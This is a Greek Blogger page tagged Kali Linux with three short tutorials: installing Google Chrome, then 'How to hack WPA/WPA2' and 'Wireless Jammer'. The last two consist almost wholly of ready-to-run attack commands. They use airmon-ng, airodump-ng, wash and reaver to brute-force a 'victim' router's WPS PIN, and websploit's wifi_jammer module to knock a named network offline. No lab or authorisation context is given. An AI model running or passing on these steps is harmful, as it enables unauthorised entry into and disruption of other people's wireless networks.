Blogger Widgets
Εμφάνιση αναρτήσεων με ετικέτα Kali Linux. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Kali Linux. Εμφάνιση όλων των αναρτήσεων

Δευτέρα 15 Ιουλίου 2013

How to install Google Chrome in Kali Linux

Download deb package from Google Chrome's site (I choosed 32bit Version)
While downloading you will see the name of deb package its google-chrome-stable_current_i386.deb 
Now to install it open a terminal and type:
ls (to be sure that you have the deb file)
dpkg -i google-chrome-stable_current_i386.deb
After the process is finished you have to add it to the menu
go to Applications-Accessories-Main Menu 
Click on the internet icon and click "New Item" 
Name: Google Chrome
Command: google-chrome
OK now exit
Go to My Computer-File System-opt-google-chrome
Find google-chrome file and open it with Leafpad
on the last line you will see exec -a "$0" "$HERE/chrome"  "$@" add this --user-data-dir
The last line should be this: exec -a "$0" "$HERE/chrome"  "$@" --user-data-dir
Save it and exit

That's it....

How to hack WPA/WPA2 (No dictionary)

Open a terminal and type:
airmon-ng
airmon-ng stop wlan0 (In my case is wlan0)
airodump-ng wlan0 

Now open a new terminal and type
wash -i wlan0 -c 6 -C -s (Victim's channel may be different in my case is 6)

Now open another new terminal and type:
reaver -i wlan0 -b 00:11:22:33:44:55 --fail-wait=360 (Victim's BSSID...in my case is 00:11:22:33:44:55)

Wireless Jammer

Open terminal and type:
websploit
use wifi/wifi_jammer
and then type
set ESSID Router (In my case is Router the victim's name)
set BSSID 00:11:22:33:44:55 (BSSID is the mac of victim's router 00:11:22:33:44:55 is an example only)
set channel 6 (The victim's channel)
RUN

That's it guys...If you want to stop the attack CTRL + C otherwise it won't stop
IP widget
Έχετε συνδεθεί στην σελίδα πριν:

Δευτερόλ.
GRDriftKing